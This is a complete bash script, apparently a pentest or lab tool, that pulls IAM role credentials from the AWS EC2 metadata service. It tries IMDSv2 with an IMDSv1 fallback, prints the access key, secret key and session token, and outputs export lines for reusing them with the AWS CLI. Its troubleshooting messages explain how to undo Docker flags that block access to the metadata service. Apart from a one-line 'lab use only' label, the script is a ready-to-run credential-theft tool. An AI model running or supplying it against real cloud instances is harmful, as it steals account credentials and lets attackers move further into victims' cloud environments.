#!/bin/bash# Script to extract IAM role credentials from EC2 metadata servic

1. #!/bin/bash
2.  
3. # Script to extract IAM role credentials from EC2 metadata service
4. # For security testing/lab environments only
5.  
6. echo "==== IAM Credential Extractor (Lab Use Only) ===="
7. echo ""
8.  
9. # Function to check if metadata service is accessible
10. check_metadata_access() {
11.     echo "[*] Checking metadata service accessibility..."
12.    
13.     # Try to reach metadata service
14.     if timeout 2 curl -s http://169.254.169.254/ > /dev/null 2>&1; then
15.         echo "[+] Metadata service is accessible"
16.         return 0
17.     else
18.         echo "[-] Metadata service is NOT accessible"
19.         echo "    This could be because:"
20.         echo "    1. Container is blocking access (--add-host redirects)"
21.         echo "    2. IMDSv2 is enforced and needs token"
22.         echo "    3. Network isolation"
23.         return 1
24.     fi
25. }
26.  
27. # Function to get IMDSv2 token
28. get_token() {
29.     echo "[*] Getting IMDSv2 token..."
30.     TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
31.         -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
32.    
33.     if [ -z "$TOKEN" ]; then
34.         echo "[-] Failed to get IMDSv2 token"
35.         echo "    Trying IMDSv1 fallback..."
36.         return 1
37.     else
38.         echo "[+] Got IMDSv2 token: ${TOKEN:0:20}..."
39.         return 0
40.     fi
41. }
42.  
43. # Function to get role name
44. get_role_name() {
45.     local use_token=$1
46.     echo "[*] Getting IAM role name..."
47.    
48.     if [ "$use_token" = "true" ]; then
49.         ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
50.             http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
51.     else
52.         # IMDSv1 fallback
53.         ROLE_NAME=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
54.     fi
55.    
56.     if [ -z "$ROLE_NAME" ]; then
57.         echo "[-] No IAM role found attached to instance"
58.         return 1
59.     else
60.         echo "[+] Found IAM role: $ROLE_NAME"
61.         return 0
62.     fi
63. }
64.  
65. # Function to get credentials
66. get_credentials() {
67.     local use_token=$1
68.     echo "[*] Getting IAM credentials for role: $ROLE_NAME"
69.    
70.     if [ "$use_token" = "true" ]; then
71.         CREDS=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
72.             http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME 2>/dev/null)
73.     else
74.         # IMDSv1 fallback
75.         CREDS=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME 2>/dev/null)
76.     fi
77.    
78.     if [ -z "$CREDS" ] || [[ "$CREDS" == *"404"* ]]; then
79.         echo "[-] Failed to get credentials"
80.         return 1
81.     else
82.         echo "[+] Successfully retrieved credentials!"
83.         echo ""
84.         echo "==== IAM Credentials ===="
85.         echo "$CREDS" | jq . 2>/dev/null || echo "$CREDS"
86.         return 0
87.     fi
88. }
89.  
90. # Function to export credentials as environment variables
91. export_credentials() {
92.     if [ -n "$CREDS" ]; then
93.         echo ""
94.         echo "[*] Exporting credentials as environment variables..."
95.        
96.         # Parse credentials
97.         ACCESS_KEY=$(echo "$CREDS" | jq -r '.AccessKeyId' 2>/dev/null || echo "$CREDS" | grep -oP '"AccessKeyId"\s*:\s*"\K[^"]+')
98.         SECRET_KEY=$(echo "$CREDS" | jq -r '.SecretAccessKey' 2>/dev/null || echo "$CREDS" | grep -oP '"SecretAccessKey"\s*:\s*"\K[^"]+')
99.         SESSION_TOKEN=$(echo "$CREDS" | jq -r '.Token' 2>/dev/null || echo "$CREDS" | grep -oP '"Token"\s*:\s*"\K[^"]+')
100.        
101.         if [ -n "$ACCESS_KEY" ] && [ -n "$SECRET_KEY" ] && [ -n "$SESSION_TOKEN" ]; then
102.             echo ""
103.             echo "# Add these to your environment:"
104.             echo "export AWS_ACCESS_KEY_ID=\"$ACCESS_KEY\""
105.             echo "export AWS_SECRET_ACCESS_KEY=\"$SECRET_KEY\""
106.             echo "export AWS_SESSION_TOKEN=\"$SESSION_TOKEN\""
107.             echo ""
108.             echo "[+] You can now use AWS CLI with these credentials!"
109.         fi
110.     fi
111. }
112.  
113. # Main execution
114. main() {
115.     # Check metadata access
116.     if ! check_metadata_access; then
117.         echo ""
118.         echo "==== Troubleshooting ===="
119.         echo "If running in Docker, make sure you DON'T have these flags:"
120.         echo "  --add-host=169.254.169.254:127.0.0.1"
121.         echo "  --add-host=metadata.ec2.internal:127.0.0.1"
122.         echo ""
123.         echo "These redirect metadata service to localhost!"
124.         exit 1
125.     fi
126.    
127.     # Try IMDSv2 first
128.     if get_token; then
129.         if get_role_name "true" && get_credentials "true"; then
130.             export_credentials
131.         fi
132.     else
133.         # Fallback to IMDSv1
134.         echo "[*] Falling back to IMDSv1..."
135.         if get_role_name "false" && get_credentials "false"; then
136.             export_credentials
137.         fi
138.     fi
139. }
140.  
141. # Run main function
142. main